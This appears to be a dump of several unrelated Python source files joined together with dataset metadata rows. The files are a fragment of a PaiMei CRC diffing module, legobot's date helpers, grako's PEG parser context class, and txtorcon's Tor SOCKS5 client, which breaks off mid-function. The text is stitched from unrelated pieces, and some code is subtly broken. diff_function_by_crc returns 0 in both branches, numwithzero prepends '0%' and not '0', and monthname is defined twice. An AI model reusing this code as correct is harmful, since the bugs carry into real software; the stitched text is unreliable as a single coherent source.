self.parent.register_match_basic_block( self.match_basic_block_by_crc, self ) # register a basic block matching routine
self.parent.register_diff_function( self.diff_function_by_crc, self ) # register a function diffing routine
self.parent.register_module(self) # register our module in the module table
def match_function_by_crc(self, function_a, function_b):
if function_a.ext["PAIMEIDiffFunction"].crc == function_b.ext["PAIMEIDiffFunction"].crc:
return 1
else:
return 0
def match_basic_block_by_crc(self, bb_a, bb_b):
if bb_a.ext["PAIMEIDiffBasicBlock"].crc == bb_b.ext["PAIMEIDiffBasicBlock"].crc:
return 1
else:
return 0
def diff_function_by_crc(self, function_a, function_b):
if function_a.ext["PAIMEIDiffFunction"].crc != function_b.ext["PAIMEIDiffFunction"].crc:
return 0
else:
return 0
| gpl-2.0 | -5,157,040,256,780,206,000 | 46.76087 | 145 | 0.57111 | false |
legoktm/legobot-old | toolserver/pywp/timedate.py | 1 | 2209 | #!usr/bin/python
# (C) Legoktm 2008-2011, MIT License
import time, datetime
"""
Not to be run as a file
Contains lists and dictionaries to help with dates
Only for English Language, however translations are welcome.
"""
MonthNames = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ]
def monthname(number):
"""
Returns the month name
for the given integer.
"""
return MonthNames[int(number)-1]
days_in_month = {
1: 31,
2: 29,
3: 31,
4: 30,
5: 31,
6: 30,
7: 31,
8: 31,
9: 30,
10: 31,
11: 30,
12: 31
}
num_to_month = {
1:'January',
2:'February',
3:'March',
4:'April',
5:'May',
6:'June',
7:'July',
8:'August',
9:'September',
10:'October',
11:'November',
12:'December',
}
month_to_num = {
'January': 1,
'February': 2,
'March': 3,
'April': 4,
'May': 5,
'June': 6,
'July': 7,
'August': 8,
'September': 9,
'October': 10,
'November': 11,
'December': 12,
}
def daysinmonth(var):
"""
Returns the number of days in a month.
var = month name or number
"""
try:
int(var)
num = True
except ValueError:
num = False
if num:
return days_in_month[int(var)]
number = month_to_num[var]
return days_in_month[number]
def currtime():
"""
Returns a time.time() object
"""
return time.time()
def currentmonth():
"""
Returns the integer of the current month.
To get the current month name, use monthname(currentmonth())
"""
return time.gmtime(currtime()).tm_mon
def currentyear():
return time.gmtime(currtime()).tm_year
def numwithzero(num):
"""
Returns a str where their is a
'0' in front of a number
"""
num = int(num)
if num >= 10:
return str(num)
else:
return '0%' + str(num)
def monthname(num):
"""
Returns the name of the month based on the integer.
"""
return num_to_month[int(num)]
def convertts(ts):
"""
Converts MediaWiki timestamps (ISO 8601)
to a human readable one.
"""
epochts = int(time.mktime(time.strptime(ts, '%Y-%m-%dT%H:%M:%SZ')))
st = time.gmtime(epochts)
year = str(st.tm_year)
hour = str(st.tm_hour)
min = str(st.tm_min)
monthname1 = monthname(st.tm_mon)
day = str(st.tm_mday)
return '%s:%s, %s %s %s' %(hour, min, day, monthname1, year)
| mit | 8,878,393,515,859,586,000 | 17.720339 | 139 | 0.634224 | false |
vmuriart/grako | grako/contexts.py | 1 | 22161 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import functools
from collections import namedtuple
from contextlib import contextmanager
from grako.util import notnone, ustr, prune_dict, is_list, info, safe_name
from grako.ast import AST
from grako import buffering
from grako import color
from grako.exceptions import (
FailedCut,
FailedLeftRecursion,
FailedLookahead,
FailedParse,
FailedPattern,
FailedSemantics,
FailedKeywordSemantics,
FailedToken,
OptionSucceeded
)
__all__ = ['ParseInfo', 'ParseContext']
ParseInfo = namedtuple(
'ParseInfo',
[
'buffer',
'rule',
'pos',
'endpos'
]
)
# decorator for rule implementation methods
def graken(*params, **kwparams):
def decorator(rule):
@functools.wraps(rule)
def wrapper(self):
name = rule.__name__
# remove the single leading and trailing underscore
# that the parser generator added
name = name[1:-1]
return self._call(rule, name, params, kwparams)
return wrapper
return decorator
class Closure(list):
pass
class ParseContext(object):
def __init__(self,
semantics=None,
parseinfo=False,
trace=False,
encoding='utf-8',
comments_re=None,
eol_comments_re=None,
whitespace=None,
ignorecase=False,
nameguard=None,
memoize_lookaheads=True,
left_recursion=True,
trace_length=72,
trace_separator=':',
trace_filename=False,
colorize=False,
keywords=None,
namechars='',
**kwargs):
super(ParseContext, self).__init__()
self._buffer = None
self.semantics = semantics
self.encoding = encoding
self.parseinfo = parseinfo
self.trace = trace
self.trace_length = trace_length
self.trace_separator = trace_separator
self.trace_filename = trace_filename
self.comments_re = comments_re
self.eol_comments_re = eol_comments_re
self.whitespace = whitespace
self.ignorecase = ignorecase
self.nameguard = nameguard
self.memoize_lookaheads = memoize_lookaheads
self.left_recursion = left_recursion
self.namechars = namechars
self._ast_stack = [AST()]
self._concrete_stack = [None]
self._rule_stack = []
self._cut_stack = [False]
self._memoization_cache = dict()
self._last_node = None
self._state = None
self._lookahead = 0
self._recursive_results = dict()
self._recursive_eval = []
self._recursive_head = []
self.colorize = colorize
self.keywords = set(keywords or [])
def _reset(self,
text=None,
filename=None,
semantics=None,
trace=None,
comments_re=None,
eol_comments_re=None,
whitespace=None,
ignorecase=None,
nameguard=None,
memoize_lookaheads=None,
left_recursion=None,
colorize=False,
namechars='',
**kwargs):
if ignorecase is None:
ignorecase = self.ignorecase
if nameguard is None:
nameguard = self.nameguard
if memoize_lookaheads is not None:
self.memoize_lookaheads = memoize_lookaheads
if left_recursion is not None:
self.left_recursion = left_recursion
if trace is not None:
self.trace = trace
if semantics is not None:
self.semantics = semantics
if colorize is not None:
self.colorize = colorize
if self.colorize:
color.init()
if isinstance(text, buffering.Buffer):
buffer = text
else:
buffer = buffering.Buffer(
text,
filename=filename,
comments_re=comments_re or self.comments_re,
eol_comments_re=eol_comments_re or self.eol_comments_re,
whitespace=notnone(whitespace, default=self.whitespace),
ignorecase=ignorecase,
nameguard=nameguard,
namechars=namechars or self.namechars,
**kwargs)
self._buffer = buffer
self._ast_stack = [AST()]
self._concrete_stack = [None]
self._rule_stack = []
self._cut_stack = [False]
self._memoization_cache = dict()
self._last_node = None
self._state = None
self._lookahead = 0
self._recursive_results = dict()
self._recursive_eval = []
self._recursive_head = []
def parse(self,
text,
rule_name='start',
filename=None,
semantics=None,
trace=False,
whitespace=None,
**kwargs):
try:
self.parseinfo = kwargs.pop('parseinfo', self.parseinfo)
self._reset(
text=text,
filename=filename,
semantics=semantics,
trace=trace or self.trace,
whitespace=whitespace if whitespace is not None else self.whitespace,
**kwargs
)
rule = self._find_rule(rule_name)
result = rule()
self.ast[rule_name] = result
return result
except FailedCut as e:
raise e.nested
finally:
self._clear_cache()
def goto(self, pos):
self._buffer.goto(pos)
@property
def last_node(self):
return self._last_node
@last_node.setter
def last_node(self, value):
self._last_node = value
@property
def _pos(self):
return self._buffer.pos
def _clear_cache(self):
self._memoization_cache = dict()
self._recursive_results = dict()
def _goto(self, pos):
self._buffer.goto(pos)
def _next_token(self):
self._buffer.next_token()
@property
def ast(self):
return self._ast_stack[-1]
@ast.setter
def ast(self, value):
self._ast_stack[-1] = value
def name_last_node(self, name):
self.ast[name] = self.last_node
def add_last_node_to_name(self, name):
self.ast.setlist(name, self.last_node)
def _push_ast(self):
self._push_cst()
self._ast_stack.append(AST())
def _pop_ast(self):
self._pop_cst()
return self._ast_stack.pop()
@property
def cst(self):
return self._concrete_stack[-1]
@cst.setter
def cst(self, value):
self._concrete_stack[-1] = value
def _push_cst(self):
self._concrete_stack.append(None)
def _pop_cst(self):
return self._concrete_stack.pop()
def _add_cst_node(self, node):
if node is None:
return
previous = self.cst
if previous is None:
self.cst = self._copy_node(node)
elif is_list(previous):
previous.append(node)
else:
self.cst = [previous, node]
def _extend_cst(self, node):
if node is None:
return
previous = self.cst
if previous is None:
self.cst = self._copy_node(node)
elif is_list(node):
if is_list(previous):
previous.extend(node)
else:
self.cst = [previous] + node
elif is_list(previous):
previous.append(node)
else:
self.cst = [previous, node]
def _copy_node(self, node):
if node is None:
return None
elif is_list(node):
return node[:]
else:
return node
def _is_cut_set(self):
return self._cut_stack[-1]
def _cut(self):
self._cut_stack[-1] = True
# Kota Mizushima et al say that we can throw away
# memos for previous positions in the buffer under
# certain circumstances, without affecting the linearity
# of PEG parsing.
# http://goo.gl/VaGpj
#
# We adopt the heuristic of always dropping the cache for
# positions less than the current cut position. It remains to
# be proven if doing it this way affects linearity. Empirically,
# it hasn't.
cutpos = self._pos
def prune_cache(cache):
prune_dict(cache, lambda k, _: k[0] < cutpos)
prune_cache(self._memoization_cache)
prune_cache(self._recursive_results)
def _push_cut(self):
self._cut_stack.append(False)
def _pop_cut(self):
return self._cut_stack.pop()
def _enter_lookahead(self):
self._lookahead += 1
def _leave_lookahead(self):
self._lookahead -= 1
def _memoization(self):
return self.memoize_lookaheads or self._lookahead == 0
def _rulestack(self):
stack = self.trace_separator.join(self._rule_stack)
if len(stack) > self.trace_length:
stack = '...' + stack[-self.trace_length:].lstrip(self.trace_separator)
return stack
def _find_rule(self, name):
return None
def _find_semantic_rule(self, name):
if self.semantics is None:
return None, None
postproc = getattr(self.semantics, '_postproc', None)
if not callable(postproc):
postproc = None
rule = getattr(self.semantics, safe_name(name), None)
if callable(rule):
return rule, postproc
rule = getattr(self.semantics, '_default', None)
if callable(rule):
return rule, postproc
return None, postproc
def _trace(self, msg, *params):
if self.trace:
msg = msg % params
info(ustr(msg), file=sys.stderr)
def _trace_event(self, event):
if self.trace:
fname = ''
if self.trace_filename:
fname = self._buffer.line_info().filename + '\n'
self._trace('%s \n%s%s \n',
event + ' ' + self._rulestack(),
color.Style.DIM + fname,
color.Style.NORMAL + self._buffer.lookahead().rstrip('\r\n')
)
def _trace_match(self, token, name=None, failed=False):
if self.trace:
fname = ''
if self.trace_filename:
fname = self._buffer.line_info().filename + '\n'
name = '/%s/' % name if name else ''
fgcolor = color.Fore.GREEN + '< 'if not failed else color.Fore.RED + '! '
self._trace(
color.Style.BRIGHT + fgcolor + '"%s" %s\n%s%s\n',
token,
name,
color.Style.DIM + fname,
color.Style.NORMAL + self._buffer.lookahead().rstrip('\r\n')
)
def _error(self, item, etype=FailedParse):
raise etype(
self._buffer,
list(reversed(self._rule_stack[:])),
item
)
def _fail(self):
self._error('fail')
def _get_parseinfo(self, node, name, start):
return ParseInfo(
self._buffer,
name,
start,
self._pos
)
def _call(self, rule, name, params, kwparams):
self._rule_stack.append(name)
pos = self._pos
try:
self._trace_event(color.Fore.YELLOW + color.Style.BRIGHT + '>')
self._last_node = None
node, newpos, newstate = self._invoke_rule(rule, name, params, kwparams)
self._goto(newpos)
self._state = newstate
self._trace_event(color.Fore.GREEN + color.Style.BRIGHT + '<')
self._add_cst_node(node)
self._last_node = node
return node
except FailedPattern:
self._error('Expecting <%s>' % name)
except FailedParse:
self._trace_event(color.Fore.RED + color.Style.BRIGHT + '!')
self._goto(pos)
raise
finally:
self._rule_stack.pop()
def _invoke_rule(self, rule, name, params, kwparams):
cache = self._memoization_cache
pos = self._pos
key = (pos, rule, self._state)
if key in cache:
memo = cache[key]
memo = self._left_recursion_check(name, key, memo)
if isinstance(memo, Exception):
raise memo
return memo
self._set_left_recursion_guard(name, key)
self._push_ast()
try:
if name[0].islower():
self._next_token()
rule(self)
node = self.ast
if not node:
node = self.cst
elif '@' in node:
node = node['@'] # override the AST
elif self.parseinfo:
node._parseinfo = self._get_parseinfo(
node,
name,
pos
)
node = self._invoke_semantic_rule(name, node, params, kwparams)
result = (node, self._pos, self._state)
result = self._left_recurse(rule, name, pos, key, result, params, kwparams)
if self._memoization() and not self._in_recursive_loop():
cache[key] = result
return result
except FailedParse as e:
if self._memoization():
cache[key] = e
raise
finally:
self._pop_ast()
def _set_left_recursion_guard(self, name, key):
exception = FailedLeftRecursion(
self._buffer,
list(reversed(self._rule_stack[:])),
name
)
# Alessandro Warth et al say that we can deal with
# direct and indirect left-recursion by seeding the
# memoization cache with a parse failure.
#
# http://www.vpri.org/pdf/tr2007002_packrat.pdf
#
if self._memoization():
self._memoization_cache[key] = exception
def _left_recursion_check(self, name, key, memo):
if isinstance(memo, FailedLeftRecursion) and self.left_recursion:
# At this point we know we've already seen this rule
# at this position. Either we've got a potential
# result from a previous pass that we can return, or
# we make a note of the rule so that we can take
# action as we unwind the rule stack.
if key in self._recursive_results:
memo = self._recursive_results[key]
else:
self._recursive_head.append(name)
return memo
def _in_recursive_loop(self):
head = self._recursive_head
return head and head[-1] in self._rule_stack
def _left_recurse(self, rule, name, pos, key, result, params, kwparams):
if self._memoization():
self._recursive_results[key] = result
# If the current name is in the head, then we've just
# unwound to the highest rule in the recursion
cache = self._memoization_cache
last_pos = pos
if (
[name] == self._recursive_head[-1:] and
self._recursive_head[-1:] != self._recursive_eval[-1:]
):
# Repeatedly apply the rule until it can't consume any
# more. We store the last good result each time. Prior
# to doing so we reset the position and remove any
# failures from the cache.
last_result = result
self._recursive_eval.append(name)
while self._pos > last_pos:
last_result = result
last_pos = self._pos
self._goto(pos)
prune_dict(cache, lambda _, v: isinstance(v, FailedParse))
try:
result = self._invoke_rule(rule, name, params, kwparams)
except FailedParse:
pass
result = last_result
self._recursive_results = dict()
self._recursive_head.pop()
self._recursive_eval.pop()
return result
def _invoke_semantic_rule(self, name, node, params, kwparams):
semantic_rule, postproc = self._find_semantic_rule(name)
try:
if semantic_rule:
node = semantic_rule(node, *(params or ()), **(kwparams or {}))
if postproc is not None:
postproc(self, node)
return node
except FailedSemantics as e:
self._error(str(e), FailedParse)
def _token(self, token):
self._next_token()
if self._buffer.match(token) is None:
self._trace_match(token, failed=True)
self._error(token, etype=FailedToken)
self._trace_match(token)
self._add_cst_node(token)
self._last_node = token
return token
def _constant(self, literal):
self._next_token()
self._trace_match(literal)
self._add_cst_node(literal)
self._last_node = literal
return literal
def _pattern(self, pattern):
token = self._buffer.matchre(pattern)
if token is None:
self._trace_match('', pattern, failed=True)
self._error(pattern, etype=FailedPattern)
self._trace_match(token, pattern)
self._add_cst_node(token)
self._last_node = token
return token
def _eof(self):
return self._buffer.atend()
def _eol(self):
return self._buffer.ateol()
def _check_eof(self):
self._next_token()
if not self._buffer.atend():
self._error('Expecting end of text.')
@contextmanager
def _try(self):
p = self._pos
s = self._state
ast_copy = self.ast.copy()
self._push_ast()
self.last_node = None
try:
self.ast = ast_copy
yield
ast = self.ast
cst = self.cst
except:
self._goto(p)
self._state = s
raise
finally:
self._pop_ast()
self.ast = ast
self._extend_cst(cst)
self.last_node = cst
@contextmanager
def _option(self):
self.last_node = None
self._push_cut()
try:
with self._try():
yield
raise OptionSucceeded()
except FailedCut:
raise
except FailedParse as e:
if self._is_cut_set():
raise FailedCut(e)
finally:
self._pop_cut()
@contextmanager
def _choice(self):
self.last_node = None
with self._try():
try:
yield
except OptionSucceeded:
pass
@contextmanager
def _optional(self):
self.last_node = None
with self._choice():
with self._option():
yield
@contextmanager
def _group(self):
self._push_cst()
try:
yield
cst = self.cst
finally:
self._pop_cst()
self._extend_cst(cst)
self.last_node = cst
@contextmanager
def _if(self):
p = self._pos
s = self._state
self._push_ast()
self._enter_lookahead()
try:
yield
finally:
self._leave_lookahead()
self._goto(p)
self._state = s
self._pop_ast() # simply discard
@contextmanager
def _ifnot(self):
try:
with self._if():
yield
except FailedParse:
pass
else:
self._error('', etype=FailedLookahead)
@contextmanager
def _ignore(self):
self._push_cst()
try:
self.cst = None
yield
finally:
self._pop_cst()
def _repeater(self, block, prefix=None):
while True:
self._push_cut()
self._push_cst()
try:
p = self._pos
with self._try():
if prefix:
with self._ignore():
prefix()
self._cut()
block()
cst = self.cst
if self._pos == p:
self._error('empty closure')
except FailedCut:
raise
except FailedParse as e:
if self._is_cut_set():
raise FailedCut(e)
break
finally:
self._pop_cst()
self._pop_cut()
self._add_cst_node(cst)
def _closure(self, block):
self._push_cst()
try:
self.cst = []
self._repeater(block)
cst = Closure(self.cst)
finally:
self._pop_cst()
self._add_cst_node(cst)
self.last_node = cst
return cst
def _positive_closure(self, block, prefix=None):
self._push_cst()
try:
self.cst = None
with self._try():
block()
self.cst = [self.cst]
self._repeater(block, prefix=prefix)
cst = Closure(self.cst)
finally:
self._pop_cst()
self._add_cst_node(cst)
self.last_node = cst
return cst
def _empty_closure(self):
cst = Closure([])
self._add_cst_node(cst)
self.last_node = cst
return cst
def _check_name(self):
name = self.last_node
if (self.ignorecase and name.upper() or name) in self.keywords:
raise FailedKeywordSemantics('"%s" is a reserved word' % name)
| bsd-2-clause | 3,773,346,253,559,332,400 | 27.930809 | 87 | 0.515184 | false |
meejah/txtorcon | txtorcon/socks.py | 1 | 23368 | # in-progress; implementing SOCKS5 client-side stuff as extended by
# tor because txsocksx will not be getting Python3 support any time
# soon, and its underlying dependency (Parsely) also doesn't support
# Python3. Also, Tor's SOCKS5 implementation is especially simple,
# since it doesn't do BIND or UDP ASSOCIATE.
from __future__ import print_function
import six
import struct
from socket import inet_pton, inet_ntoa, inet_aton, AF_INET6, AF_INET
from twisted.internet.defer import inlineCallbacks, returnValue, Deferred
from twisted.internet.protocol import Protocol, Factory
from twisted.internet.address import IPv4Address, IPv6Address, HostnameAddress
from twisted.python.failure import Failure
from twisted.protocols import portforward
from twisted.protocols import tls
from twisted.internet.interfaces import IStreamClientEndpoint
from zope.interface import implementer
import ipaddress
import automat
from txtorcon import util
__all__ = (
'resolve',
'resolve_ptr',
'SocksError',
'GeneralServerFailureError',
'ConnectionNotAllowedError',
'NetworkUnreachableError',
'HostUnreachableError',
'ConnectionRefusedError',
'TtlExpiredError',
'CommandNotSupportedError',
'AddressTypeNotSupportedError',
'TorSocksEndpoint',
)
def _create_ip_address(host, port):
if not isinstance(host, six.text_type):
raise ValueError(
"'host' must be {}, not {}".format(six.text_type, type(host))
)
try:
a = ipaddress.ip_address(host)
except ValueError:
a = None
if isinstance(a, ipaddress.IPv4Address):
return IPv4Address('TCP', host, port)
if isinstance(a, ipaddress.IPv6Address):
return IPv6Address('TCP', host, port)
addr = HostnameAddress(host, port)
addr.host = host
return addr
class _SocksMachine(object):
"""
trying to prototype the SOCKS state-machine in automat
This is a SOCKS state machine to make a single request.
"""
_machine = automat.MethodicalMachine()
SUCCEEDED = 0x00
REPLY_IPV4 = 0x01
REPLY_HOST = 0x03
REPLY_IPV6 = 0x04
# XXX address = (host, port) instead
def __init__(self, req_type, host,
port=0,
on_disconnect=None,
on_data=None,
create_connection=None):
if req_type not in self._dispatch:
raise ValueError(
"Unknown request type '{}'".format(req_type)
)
if req_type == 'CONNECT' and create_connection is None:
raise ValueError(
"create_connection function required for '{}'".format(
req_type
)
)
if not isinstance(host, (bytes, str, six.text_type)):
raise ValueError(
"'host' must be text (not {})".format(type(host))
)
# XXX what if addr is None?
self._req_type = req_type
self._addr = _create_ip_address(six.text_type(host), port)
self._data = b''
self._on_disconnect = on_disconnect
self._create_connection = create_connection
# XXX FIXME do *one* of these:
self._on_data = on_data
self._outgoing_data = []
# the other side of our proxy
self._sender = None
self._when_done = util.SingleObserver()
def when_done(self):
"""
Returns a Deferred that fires when we're done
"""
return self._when_done.when_fired()
def _data_to_send(self, data):
if self._on_data:
self._on_data(data)
else:
self._outgoing_data.append(data)
def send_data(self, callback):
"""
drain all pending data by calling `callback()` on it
"""
# a "for x in self._outgoing_data" would potentially be more
# efficient, but then there's no good way to bubble exceptions
# from callback() out without lying about how much data we
# processed .. or eat the exceptions in here.
while len(self._outgoing_data):
data = self._outgoing_data.pop(0)
callback(data)
def feed_data(self, data):
# I feel like maybe i'm doing all this buffering-stuff
# wrong. but I also don't want a bunch of "received 1 byte"
# etc states hanging off everything that can "get data"
self._data += data
self.got_data()
@_machine.output()
def _parse_version_reply(self):
"waiting for a version reply"
if len(self._data) >= 2:
reply = self._data[:2]
self._data = self._data[2:]
(version, method) = struct.unpack('BB', reply)
if version == 5 and method in [0x00, 0x02]:
self.version_reply(method)
else:
if version != 5:
self.version_error(SocksError(
"Expected version 5, got {}".format(version)))
else:
self.version_error(SocksError(
"Wanted method 0 or 2, got {}".format(method)))
def _parse_ipv4_reply(self):
if len(self._data) >= 10:
addr = inet_ntoa(self._data[4:8])
port = struct.unpack('H', self._data[8:10])[0]
self._data = self._data[10:]
if self._req_type == 'CONNECT':
self.reply_ipv4(addr, port)
else:
self.reply_domain_name(addr)
def _parse_ipv6_reply(self):
if len(self._data) >= 22:
addr = self._data[4:20]
port = struct.unpack('H', self._data[20:22])[0]
self._data = self._data[22:]
self.reply_ipv6(addr, port)
def _parse_domain_name_reply(self):
assert len(self._data) >= 8 # _parse_request_reply checks this
addrlen = struct.unpack('B', self._data[4:5])[0]
# may simply not have received enough data yet...
if len(self._data) < (5 + addrlen + 2):
return
addr = self._data[5:5 + addrlen]
# port = struct.unpack('H', self._data[5 + addrlen:5 + addrlen + 2])[0]
self._data = self._data[5 + addrlen + 2:]
self.reply_domain_name(addr)
@_machine.output()
def _parse_request_reply(self):
"waiting for a reply to our request"
# we need at least 6 bytes of data: 4 for the "header", such
# as it is, and 2 more if it's DOMAINNAME (for the size) or 4
# or 16 more if it's an IPv4/6 address reply. plus there's 2
# bytes on the end for the bound port.
if len(self._data) < 8:
return
msg = self._data[:4]
# not changing self._data yet, in case we've not got
# enough bytes so far.
(version, reply, _, typ) = struct.unpack('BBBB', msg)
if version != 5:
self.reply_error(SocksError(
"Expected version 5, got {}".format(version)))
return
if reply != self.SUCCEEDED:
self.reply_error(_create_socks_error(reply))
return
reply_dispatcher = {
self.REPLY_IPV4: self._parse_ipv4_reply,
self.REPLY_HOST: self._parse_domain_name_reply,
self.REPLY_IPV6: self._parse_ipv6_reply,
}
try:
method = reply_dispatcher[typ]
except KeyError:
self.reply_error(SocksError(
"Unexpected response type {}".format(typ)))
return
method()
@_machine.output()
def _make_connection(self, addr, port):
"make our proxy connection"
sender = self._create_connection(addr, port)
# XXX look out! we're depending on this "sender" implementing
# certain Twisted APIs, and the state-machine shouldn't depend
# on that.
# XXX also, if sender implements producer/consumer stuff, we
# should register ourselves (and implement it to) -- but this
# should really be taking place outside the state-machine in
# "the I/O-doing" stuff
self._sender = sender
self._when_done.fire(sender)
@_machine.output()
def _domain_name_resolved(self, domain):
self._when_done.fire(domain)
@_machine.input()
def connection(self):
"begin the protocol (i.e. connection made)"
@_machine.input()
def disconnected(self, error):
"the connection has gone away"
@_machine.input()
def got_data(self):
"we recevied some data and buffered it"
@_machine.input()
def version_reply(self, auth_method):
"the SOCKS server replied with a version"
@_machine.input()
def version_error(self, error):
"the SOCKS server replied, but we don't understand"
@_machine.input()
def reply_error(self, error):
"the SOCKS server replied with an error"
@_machine.input()
def reply_ipv4(self, addr, port):
"the SOCKS server told me an IPv4 addr, port"
@_machine.input()
def reply_ipv6(self, addr, port):
"the SOCKS server told me an IPv6 addr, port"
@_machine.input()
def reply_domain_name(self, domain):
"the SOCKS server told me a domain-name"
@_machine.input()
def answer(self):
"the SOCKS server replied with an answer"
@_machine.output()
def _send_version(self):
"sends a SOCKS version reply"
self._data_to_send(
# for anonymous(0) *and* authenticated (2): struct.pack('BBBB', 5, 2, 0, 2)
struct.pack('BBB', 5, 1, 0)
)
@_machine.output()
def _disconnect(self, error):
"done"
if self._on_disconnect:
self._on_disconnect(str(error))
if self._sender:
self._sender.connectionLost(Failure(error))
self._when_done.fire(Failure(error))
@_machine.output()
def _send_request(self, auth_method):
"send the request (connect, resolve or resolve_ptr)"
assert auth_method == 0x00 # "no authentication required"
return self._dispatch[self._req_type](self)
@_machine.output()
def _relay_data(self):
"relay any data we have"
if self._data:
d = self._data
self._data = b''
# XXX this is "doing I/O" in the state-machine and it
# really shouldn't be ... probably want a passed-in
# "relay_data" callback or similar?
self._sender.dataReceived(d)
def _send_connect_request(self):
"sends CONNECT request"
# XXX needs to support v6 ... or something else does
host = self._addr.host
port = self._addr.port
if isinstance(self._addr, (IPv4Address, IPv6Address)):
is_v6 = isinstance(self._addr, IPv6Address)
self._data_to_send(
struct.pack(
'!BBBB4sH',
5, # version
0x01, # command
0x00, # reserved
0x04 if is_v6 else 0x01,
inet_pton(AF_INET6 if is_v6 else AF_INET, host),
port,
)
)
else:
host = host.encode('ascii')
self._data_to_send(
struct.pack(
'!BBBBB{}sH'.format(len(host)),
5, # version
0x01, # command
0x00, # reserved
0x03,
len(host),
host,
port,
)
)
@_machine.output()
def _send_resolve_request(self):
"sends RESOLVE_PTR request (Tor custom)"
host = self._addr.host.encode()
self._data_to_send(
struct.pack(
'!BBBBB{}sH'.format(len(host)),
5, # version
0xF0, # command
0x00, # reserved
0x03, # DOMAINNAME
len(host),
host,
0, # self._addr.port?
)
)
@_machine.output()
def _send_resolve_ptr_request(self):
"sends RESOLVE_PTR request (Tor custom)"
addr_type = 0x04 if isinstance(self._addr, ipaddress.IPv4Address) else 0x01
encoded_host = inet_aton(self._addr.host)
self._data_to_send(
struct.pack(
'!BBBB4sH',
5, # version
0xF1, # command
0x00, # reserved
addr_type,
encoded_host,
0, # port; unused? SOCKS is fun
)
)
@_machine.state(initial=True)
def unconnected(self):
"not yet connected"
@_machine.state()
def sent_version(self):
"we've sent our version request"
@_machine.state()
def sent_request(self):
"we've sent our stream/etc request"
@_machine.state()
def relaying(self):
"received our response, now we can relay"
@_machine.state()
def abort(self, error_message):
"we've encountered an error"
@_machine.state()
def done(self):
"operations complete"
unconnected.upon(
connection,
enter=sent_version,
outputs=[_send_version],
)
sent_version.upon(
got_data,
enter=sent_version,
outputs=[_parse_version_reply],
)
sent_version.upon(
version_error,
enter=abort,
outputs=[_disconnect],
)
sent_version.upon(
version_reply,
enter=sent_request,
outputs=[_send_request],
)
sent_version.upon(
disconnected,
enter=unconnected,
outputs=[_disconnect]
)
sent_request.upon(
got_data,
enter=sent_request,
outputs=[_parse_request_reply],
)
sent_request.upon(
reply_ipv4,
enter=relaying,
outputs=[_make_connection],
)
sent_request.upon(
reply_ipv6,
enter=relaying,
outputs=[_make_connection],
)
# XXX this isn't always a _domain_name_resolved -- if we're a
# req_type CONNECT then it's _make_connection_domain ...
sent_request.upon(
reply_domain_name,
enter=done,
outputs=[_domain_name_resolved],
)
sent_request.upon(
reply_error,
enter=abort,
outputs=[_disconnect],
)
# XXX FIXME this needs a test
sent_request.upon(
disconnected,
enter=abort,
outputs=[_disconnect], # ... or is this redundant?
)
relaying.upon(
got_data,
enter=relaying,
outputs=[_relay_data],
)
relaying.upon(
disconnected,
enter=done,
outputs=[_disconnect],
)
abort.upon(
got_data,
enter=abort,
outputs=[],
)
abort.upon(
disconnected,
enter=abort,
outputs=[],
)
done.upon(
disconnected,
enter=done,
outputs=[],
)
_dispatch = {
'CONNECT': _send_connect_request,
'RESOLVE': _send_resolve_request,
'RESOLVE_PTR': _send_resolve_ptr_request,
}
class _TorSocksProtocol(Protocol):
def __init__(self, host, port, socks_method, factory):
self._machine = _SocksMachine(
req_type=socks_method,
host=host, # noqa unicode() on py3, py2? we want idna, actually?
port=port,
on_disconnect=self._on_disconnect,
on_data=self._on_data,
create_connection=self._create_connection,
)
self._factory = factory
def when_done(self):
return self._machine.when_done()
def connectionMade(self):
self._machine.connection()
# we notify via the factory that we have teh
# locally-connecting host -- this is e.g. used by the "stream
# over one particular circuit" code to determine the local
# port that "our" SOCKS connection went to
self.factory._did_connect(self.transport.getHost())
def connectionLost(self, reason):
self._machine.disconnected(SocksError(reason))
def dataReceived(self, data):
self._machine.feed_data(data)
def _on_data(self, data):
self.transport.write(data)
def _create_connection(self, addr, port):
addr = IPv4Address('TCP', addr, port)
sender = self._factory.buildProtocol(addr)
client_proxy = portforward.ProxyClient()
sender.makeConnection(self.transport)
# portforward.ProxyClient is going to call setPeer but this
# probably doesn't have it...
setattr(sender, 'setPeer', lambda _: None)
client_proxy.setPeer(sender)
self._sender = sender
return sender
def _on_disconnect(self, error_message):
self.transport.loseConnection()
# self.transport.abortConnection()#SocksError(error_message)) ?
class _TorSocksFactory(Factory):
protocol = _TorSocksProtocol
# XXX should do validation on this stuff so we get errors before
# building the protocol
def __init__(self, *args, **kw):
self._args = args
self._kw = kw
self._host = None
self._when_connected = util.SingleObserver()
def _get_address(self):
"""
Returns a Deferred that fires with the transport's getHost()
when this SOCKS protocol becomes connected.
"""
return self._when_connected.when_fired()
def _did_connect(self, host):
self._host = host
self._when_connected.fire(host)
def buildProtocol(self, addr):
p = self.protocol(*self._args, **self._kw)
p.factory = self
return p
class SocksError(Exception):
code = None
message = ''
def __init__(self, message='', code=None):
super(SocksError, self).__init__(message or self.message)
self.message = message or self.message
self.code = code or self.code
class GeneralServerFailureError(SocksError):
code = 0x01
message = 'general SOCKS server failure'
class ConnectionNotAllowedError(SocksError):
code = 0x02
message = 'connection not allowed by ruleset'
class NetworkUnreachableError(SocksError):
code = 0x03
message = 'Network unreachable'
class HostUnreachableError(SocksError):
code = 0x04
message = 'Host unreachable'
class ConnectionRefusedError(SocksError):
code = 0x05
message = 'Connection refused'
class TtlExpiredError(SocksError):
code = 0x06
message = 'TTL expired'
class CommandNotSupportedError(SocksError):
code = 0x07
message = 'Command not supported'
class AddressTypeNotSupportedError(SocksError):
code = 0x08
message = 'Address type not supported'
_socks_errors = {cls.code: cls for cls in SocksError.__subclasses__()}
def _create_socks_error(code):
try:
return _socks_errors[code]()
except KeyError:
return SocksError("Unknown SOCKS error-code {}".format(code),
code=code)
@inlineCallbacks
def resolve(tor_endpoint, hostname):
"""
This is easier to use via :meth:`txtorcon.Tor.dns_resolve`
:param tor_endpoint: the Tor SOCKS endpoint to use.
:param hostname: the hostname to look up.
"""
if six.PY2 and isinstance(hostname, str):
hostname = unicode(hostname) # noqa
elif six.PY3 and isinstance(hostname, bytes):
hostname = hostname.decode('ascii')
factory = _TorSocksFactory(
hostname, 0, 'RESOLVE', None,
)
proto = yield tor_endpoint.connect(factory)
result = yield proto.when_done()
returnValue(result)
@inlineCallbacks
def resolve_ptr(tor_endpoint, ip):
"""
